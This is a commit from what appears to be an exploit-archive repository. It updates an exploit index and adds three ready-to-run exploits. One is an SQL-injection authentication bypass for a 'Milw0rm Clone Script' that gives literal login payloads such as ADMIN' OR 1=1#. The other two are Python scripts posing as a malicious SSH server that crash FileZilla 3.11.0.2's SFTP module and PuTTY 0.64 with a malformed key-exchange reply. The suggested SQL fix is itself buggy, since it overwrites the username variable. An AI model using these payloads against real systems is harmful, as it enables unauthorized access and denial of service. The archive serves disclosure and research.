DB: 2015-06-16

3 new exploits
2015-06-16 05:02:49 +00:00 · 2015-06-16 05:02:49 +00:00 · 961bfe01be
commit 961bfe01be
parent 52c2474004
7 changed files with 478 additions and 288 deletions
--- a/files.csv
+++ b/files.csv
@ -1110,7 +1110,7 @@ id,file,description,date,author,platform,type,port
 1331,platforms/multiple/dos/1331.c,"Macromedia Flash Plugin <= 7.0.19.0 (Action) Denial of Service Exploit",2005-11-18,BassReFLeX,multiple,dos,0
 1332,platforms/windows/remote/1332.pm,"MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit",2005-11-20,y0,windows,remote,143
 1333,platforms/hardware/remote/1333.pm,"Google Search Appliance proxystylesheet XSLT Java Code Execution",2005-11-20,"H D Moore",hardware,remote,80
-1336,platforms/windows/dos/1336.cpp,"FileZilla Server Terminal 0.9.4d Buffer Overflow PoC",2005-11-21,"Inge Henriksen",windows,dos,0
+1336,platforms/windows/dos/1336.cpp,"FileZilla Server Terminal 0.9.4d - Buffer Overflow PoC",2005-11-21,"Inge Henriksen",windows,dos,0
 1337,platforms/php/webapps/1337.php,"Mambo <= 4.5.2 Globals Overwrite / Remote Command Exection Exploit",2005-11-22,rgod,php,webapps,0
 1338,platforms/hardware/dos/1338.pl,"Cisco PIX Spoofed TCP SYN Packets Remote Denial of Service Exploit",2005-11-23,"Janis Vizulis",hardware,dos,0
 1339,platforms/windows/dos/1339.c,"FreeFTPD <= 1.0.10 (PORT Command) Denial of Service Exploit",2005-11-24,"Stefan Lochbihler",windows,dos,0
@ -2575,7 +2575,7 @@ id,file,description,date,author,platform,type,port
 2898,platforms/php/webapps/2898.txt,"ThinkEdit 1.9.2 (render.php) Remote File Inclusion Vulnerability",2006-12-08,r0ut3r,php,webapps,0
 2899,platforms/php/webapps/2899.txt,"paFileDB 3.5.2/3.5.3 - Remote Login Bypass SQL Injection Vulnerability",2006-12-08,koray,php,webapps,0
 2900,platforms/windows/dos/2900.py,"Microsoft Windows - DNS Resolution - Remote Denial of Service PoC (MS06-041)",2006-12-09,"Winny Thomas",windows,dos,0
-2901,platforms/windows/dos/2901.php,"Filezilla FTP Server 0.9.20b/0.9.21 (STOR) Denial of Service Exploit",2006-12-09,rgod,windows,dos,0
+2901,platforms/windows/dos/2901.php,"Filezilla FTP Server 0.9.20b/0.9.21 - (STOR) Denial of Service Exploit",2006-12-09,rgod,windows,dos,0
 2902,platforms/php/webapps/2902.pl,"TorrentFlux 2.2 (downloaddetails.php) Local File Disclosure Exploit",2006-12-09,r0ut3r,php,webapps,0
 2903,platforms/php/webapps/2903.pl,"TorrentFlux 2.2 (maketorrent.php) Remote Command Execution Exploit",2006-12-09,r0ut3r,php,webapps,0
 2904,platforms/php/webapps/2904.txt,"mxBB Module Profile CP 0.91c Remote File Include Vulnerability",2006-12-09,bd0rk,php,webapps,0
@ -2588,7 +2588,7 @@ id,file,description,date,author,platform,type,port
 2911,platforms/multiple/dos/2911.txt,"Sophos Antivirus - .CHM Chunk Name Length Memory Corruption PoC",2006-12-10,"Damian Put",multiple,dos,0
 2912,platforms/multiple/dos/2912.txt,"Sophos / Trend Micro Antivirus - .RAR File Denial of Service PoC",2006-12-10,"Damian Put",multiple,dos,0
 2913,platforms/php/webapps/2913.php,"phpAlbum <= 0.4.1 Beta 6 (language.php) Local File Inclusion Exploit",2006-12-10,Kacper,php,webapps,0
-2914,platforms/windows/dos/2914.php,"Filezilla FTP Server <= 0.9.21 (LIST/NLST) Denial of Service Exploit",2006-12-11,shinnai,windows,dos,0
+2914,platforms/windows/dos/2914.php,"Filezilla FTP Server <= 0.9.21 - (LIST/NLST) Denial of Service Exploit",2006-12-11,shinnai,windows,dos,0
 2915,platforms/hardware/dos/2915.c,"D-Link DWL-2000AP 2.11 (ARP Flood) Remote Denial of Service Exploit",2006-12-11,poplix,hardware,dos,0
 2916,platforms/windows/dos/2916.php,"Golden FTP server 1.92 - (USER/PASS) Heap Overflow PoC",2006-12-11,rgod,windows,dos,0
 2917,platforms/php/webapps/2917.txt,"mxBB Module ErrorDocs 1.0 (common.php) Remote Inclusion Vulnerability",2006-12-11,bd0rk,php,webapps,0
@ -23371,7 +23371,7 @@ id,file,description,date,author,platform,type,port
 26217,platforms/php/webapps/26217.html,"CMS Made Simple 0.10 Lang.PHP Remote File Include Vulnerability",2005-08-31,groszynskif,php,webapps,0
 26218,platforms/linux/local/26218.txt,"Frox 0.7.18 - Arbitrary Configuration File Access Vulnerability",2005-09-01,rotor,linux,local,0
 26219,platforms/windows/dos/26219.c,"WhitSoft Development SlimFTPd 3.17 - Remote Denial of Service Vulnerability",2005-09-02,"Critical Security",windows,dos,0
-26220,platforms/windows/dos/26220.c,"FileZilla 2.2.15 FTP Client Hard-Coded Cipher Key Vulnerability",2005-09-02,m123303@richmond.ac.uk,windows,dos,0
+26220,platforms/windows/dos/26220.c,"FileZilla 2.2.15 - FTP Client Hard-Coded Cipher Key Vulnerability",2005-09-02,m123303@richmond.ac.uk,windows,dos,0
 26221,platforms/windows/remote/26221.txt,"Rediff Bol 7.0 Instant Messenger ActiveX Control Information Disclosure Vulnerability",2005-09-05,"Gregory R. Panakkal",windows,remote,0
 26222,platforms/windows/local/26222.c,"Microsoft Windows 2000/2003/XP Keyboard Event Privilege Escalation Weakness",2005-08-06,"Andres Tarasco",windows,local,0
 26223,platforms/php/webapps/26223.txt,"Land Down Under 601/602/700/701/800/801 Events.PHP HTML Injection Vulnerability",2005-09-06,conor.e.buckley,php,webapps,0
@ -33455,7 +33455,7 @@ id,file,description,date,author,platform,type,port
 37066,platforms/hardware/remote/37066.py,"Phoenix Contact ILC 150 ETH PLC Remote Control Script",2015-05-20,Photubias,hardware,remote,0
 37067,platforms/php/webapps/37067.txt,"WordPress FeedWordPress Plugin 2015.0426 - SQL Injection",2015-05-20,"Adrián M. F.",php,webapps,80
 37068,platforms/windows/dos/37068.py,"ZOC SSH Client Buffer Overflow Vulnerability (SEH)",2015-05-20,"Dolev Farhi",windows,dos,0
-37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 execve _/bin/sh_ - shellcode 26 bytes",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0
+37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 - execve _/bin/sh_ - shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0
 37070,platforms/php/webapps/37070.txt,"WordPress Uploadify Integration Plugin 0.9.6 Multiple Cross Site Scripting Vulnerabilities",2012-04-06,waraxe,php,webapps,0
 37071,platforms/php/webapps/37071.txt,"CitrusDB 2.4.1 Local File Include and SQL Injection Vulnerabilities",2012-04-09,wacky,php,webapps,0
 37072,platforms/php/webapps/37072.txt,"Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities",2012-04-10,"Chokri B.A",php,webapps,0
@ -33629,7 +33629,7 @@ id,file,description,date,author,platform,type,port
 37257,platforms/php/webapps/37257.txt,"FiverrScript CSRF Vulnerability (Add New Admin)",2015-06-10,"Mahmoud Gamal",php,webapps,80
 37258,platforms/hardware/webapps/37258.py,"GeoVision (GeoHttpServer) Webcams Remote File Disclosure Exploit",2015-06-10,"Viktor Minin",hardware,webapps,0
 37259,platforms/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",php,webapps,443
-37260,platforms/jsp/webapps/37260.txt,"Bonita BPM 6.5.1 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",jsp,webapps,80
+37260,platforms/jsp/webapps/37260.txt,"Bonita BPM 6.5.1 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",jsp,webapps,8080
 37261,platforms/hardware/webapps/37261.txt,"Alcatel-Lucent OmniSwitch - CSRF Vulnerability",2015-06-10,"RedTeam Pentesting",hardware,webapps,80
 37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 Mod_Copy Command Execution",2015-06-10,metasploit,linux,remote,0
 37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80
@ -33639,7 +33639,7 @@ id,file,description,date,author,platform,type,port
 37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
 37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,"John Page",php,webapps,80
 37271,platforms/multiple/webapps/37271.txt,"Opsview <= 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80
-37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,0
+37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,8080
 37274,platforms/php/webapps/37274.txt,"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal",2015-06-12,"Larry W. Cashdollar",php,webapps,80
 37275,platforms/php/webapps/37275.txt,"WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload",2015-06-12,"Larry W. Cashdollar",php,webapps,80
 37277,platforms/php/webapps/37277.txt,"concrete5 index.php/tools/required/files/search_dialog ocID Parameter XSS",2012-05-20,AkaStep,php,webapps,0
@ -33649,3 +33649,6 @@ id,file,description,date,author,platform,type,port
 37281,platforms/php/webapps/37281.txt,"concrete5 index.php/tools/required/files/import Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
 37282,platforms/php/webapps/37282.txt,"concrete5 index.php/tools/required/files/bulk_properties searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
 37283,platforms/php/webapps/37283.txt,"AZ Photo Album Cross Site Scripting and Arbitrary File Upload Vulnerabilities",2012-05-20,"Eyup CELIK",php,webapps,0
+37286,platforms/windows/dos/37286.py,"Filezilla 3.11.0.2 - SFTP Module Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
+37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Auth Bypass) SQL Injection Vulnerability",2015-06-15,"walid naceri",php,webapps,0
+37291,platforms/windows/dos/37291.py,"Putty 0.64 - Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
--- a/platforms/php/webapps/37290.txt
+++ b/platforms/php/webapps/37290.txt
@ -0,0 +1,46 @@
+<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+|   Exploit Title: Milw0rm Clone Script v1.0 (Auth Bypass) SQL Injection Vulnerability |
+|            Date: 06.13.2015                                                          |
+|   Exploit Daddy: Walid Naceri                                                        |
+| Vendor Homepage: http://milw0rm.sourceforge.net/                                     |
+|   Software Link: http://sourceforge.net/projects/milw0rm/files/milw0rm.rar/download  |
+|         Version: v1.0                                                                |
+|       Tested On: Kali Linux, Mac, Windows                                            |
+|><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><|
+| Website exploiter: WwW.security-Dz.Com                                               |
+| CALLINGout: 1337day/inj3ct0r Please admit that they got your server haha CIA         |
+| Sorry: Sorry pancaker, you missed that one :(                                        |
+<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+ 
+ 
+ 
+ 
+### vuln codez  admin/login.php ###
+<?
+$usr = htmlspecialchars(trim($_POST['usr'])); ---- what are you doing?
+$pwd = htmlspecialchars(trim($_POST['pwd'])); ---- are you sure that you are a programmer?
+if($usr && $pwd){
+$login = mysql_query("SELECT * FROM `site_info` WHERE `adm_usr`='".$usr."' AND `adm_pwd`='".md5($pwd)."';");
+$row = mysql_num_rows($login);
+----Bla Bla Bla--------
+ 
+ 
+ 
+ 
+### manual ###
+Go to the login admin panel :)
+
+Exploit 1:
+USER: ADMIN' OR ''='
+PASS: ADMIN' OR ''='
+
+Exploit 2:
+USER: ADMIN' OR 1=1#
+PASS: Anything Bro :)
+
+
+
+### How to fix, learn bro some php again :) ###
+
+$usr = htmlspecialchars(trim(mysql_real_escape_string($_POST['usr'])));
+$usr = htmlspecialchars(trim(mysql_real_escape_string($_POST['pwd'])));
--- a/platforms/windows/dos/37286.py
+++ b/platforms/windows/dos/37286.py
@ -0,0 +1,71 @@
+'''
+# Exploit title: filezilla 3.11.0.2 sftp module denial of service vulnerability
+# Date: 5-6-2015
+# Vendor homepage: http://www.chiark.greenend.org.uk
+# Software Link: http://dl.filehorse.com/win/file-transfer-and-networking/filezilla/FileZilla-3.11.0.2.exe?st=6b87ZegIN1LDhSGAw5M4wg&e=1434351489&fn=FileZilla_3.11.0.2_win32-setup.exe
+# Version: 3.11.0.2
+# Author: 3unnym00n
+
+# Details:
+# --------
+# sftp module for filezilla based on putty's psftp component.
+# when doing the ssh dh group exchange old style, if the server send a malformed dh group exchange reply, can lead the filezilla component crash
+
+# Tested On: win7, xp
+# operating steps: run the py, then execute : "D:\programfile\FileZilla FTP Client\filezilla.exe" sftp://root@127.0.0.1
+
+'''
+
+
+import socket
+import struct
+
+soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+soc.bind(('127.0.0.1', 22))
+soc.listen(1)
+client, addr = soc.accept()
+
+## do banner exchange
+## send server banner
+client.send('SSH-2.0-SUCK\r\n')
+## recv client banner
+client_banner = ''
+while True:
+    data = client.recv(1)
+    if data == '\x0a':
+        break
+    client_banner += data
+
+print 'the client banner is: %s'%client_banner.__repr__()
+
+## do key exchange
+## recv client algorithms
+str_pl = client.recv(4)
+pl = struct.unpack('>I', str_pl)[0]
+client.recv(pl)
+## send server algorithms
+client.send('000001b4091464f9a91726b1efcfa98bed8e93bbd93d000000596469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d616e2d67726f7570312d73686131000000077373682d727361000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f7572323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f75723235360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d39360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d3936000000046e6f6e65000000046e6f6e6500000000000000000000000000000000000000000000'.decode('hex'))
+
+
+## do dh key exchange
+## recv dh group exchange request
+str_pl = client.recv(4)
+pl = struct.unpack('>I', str_pl)[0]
+client.recv(pl)
+## send dh group exchange group
+client.send('00000114081f0000010100c038282de061be1ad34f31325efe9b1d8520db14276ceb61fe3a2cb8d77ffe3b9a067505205bba8353847fd2ea1e2471e4294862a5d4c4f9a2b80f9da0619327cdbf2eb608b0b5549294a955972aa3512821b24782dd8ab97b53aab04b48180394abfbc4dcf9b819fc0cb5ac1275ac5f16ec378163501e4b27d49c67f660333888f1d503b96fa9c6c880543d8b5f04d70fe508ffca161798ad32015145b8e9ad43aab48ada81fd1e5a8ea7711a8ff57ec7c4c081b47fab0c2e9fa468e70dd6700f3412224890d5e99527a596ce635195f3a6d35e563bf4892df2c79c809704411018d919102d12cb112ce1e66ebf5db9f409f6c82a6a6e1e21e23532cf24a6e300000001020000000000000000'.decode('hex'))
+
+## recv dh group exchange init
+str_pl = client.recv(4)
+pl = struct.unpack('>I', str_pl)[0]
+client.recv(pl)
+
+## send dh group exchange reply
+dh_gex_reply_msg = '\x00\x00\x02\x3c' ## pl
+dh_gex_reply_msg += '\x09' ## padding len
+dh_gex_reply_msg += '\x21' ## dh gex reply
+dh_gex_reply_msg += '\x00\x00\xff\xff' ## dh host key len
+dh_gex_reply_msg += 'A'*600
+
+client.sendall(dh_gex_reply_msg)
+
--- a/platforms/windows/dos/37291.py
+++ b/platforms/windows/dos/37291.py
@ -0,0 +1,70 @@
+'''
+# Exploit title: putty v0.64 denial of service vulnerability
+# Date: 5-6-2015
+# Vendor homepage: http://www.chiark.greenend.org.uk
+# Software Link: http://the.earth.li/~sgtatham/putty/latest/x86/putty-0.64-installer.exe
+# Version: 0.64
+# Author: 3unnym00n
+
+# Details:
+# --------
+# when doing the ssh dh group exchange old style, if the server send a malformed dh group exchange reply, can lead the putty crash
+
+# Tested On: win7, xp
+# operating steps: run the py, then execute : "D:\programfile\PuTTYlatest\putty.exe" -ssh  root@127.0.0.1
+
+'''
+
+
+import socket
+import struct
+
+soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+soc.bind(('127.0.0.1', 22))
+soc.listen(1)
+client, addr = soc.accept()
+
+## do banner exchange
+## send server banner
+client.send('SSH-2.0-paramiko_1.16.0\r\n')
+## recv client banner
+client_banner = ''
+while True:
+    data = client.recv(1)
+    if data == '\x0a':
+        break
+    client_banner += data
+
+print 'the client banner is: %s'%client_banner.__repr__()
+
+## do key exchange
+## recv client algorithms
+str_pl = client.recv(4)
+pl = struct.unpack('>I', str_pl)[0]
+client.recv(pl)
+## send server algorithms
+client.send('000001b4091464f9a91726b1efcfa98bed8e93bbd93d000000596469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d616e2d67726f7570312d73686131000000077373682d727361000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f7572323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f75723235360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d39360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d3936000000046e6f6e65000000046e6f6e6500000000000000000000000000000000000000000000'.decode('hex'))
+
+
+## do dh key exchange
+## recv dh group exchange request
+str_pl = client.recv(4)
+pl = struct.unpack('>I', str_pl)[0]
+client.recv(pl)
+## send dh group exchange group
+client.send('00000114081f0000010100c038282de061be1ad34f31325efe9b1d8520db14276ceb61fe3a2cb8d77ffe3b9a067505205bba8353847fd2ea1e2471e4294862a5d4c4f9a2b80f9da0619327cdbf2eb608b0b5549294a955972aa3512821b24782dd8ab97b53aab04b48180394abfbc4dcf9b819fc0cb5ac1275ac5f16ec378163501e4b27d49c67f660333888f1d503b96fa9c6c880543d8b5f04d70fe508ffca161798ad32015145b8e9ad43aab48ada81fd1e5a8ea7711a8ff57ec7c4c081b47fab0c2e9fa468e70dd6700f3412224890d5e99527a596ce635195f3a6d35e563bf4892df2c79c809704411018d919102d12cb112ce1e66ebf5db9f409f6c82a6a6e1e21e23532cf24a6e300000001020000000000000000'.decode('hex'))
+
+## recv dh group exchange init
+str_pl = client.recv(4)
+pl = struct.unpack('>I', str_pl)[0]
+client.recv(pl)
+
+## send dh group exchange reply
+dh_gex_reply_msg = '\x00\x00\x02\x3c' ## pl
+dh_gex_reply_msg += '\x09' ## padding len
+dh_gex_reply_msg += '\x21' ## dh gex reply
+dh_gex_reply_msg += '\x00\x00\xff\xff' ## dh host key len
+dh_gex_reply_msg += 'A'*600
+
+client.sendall(dh_gex_reply_msg)
+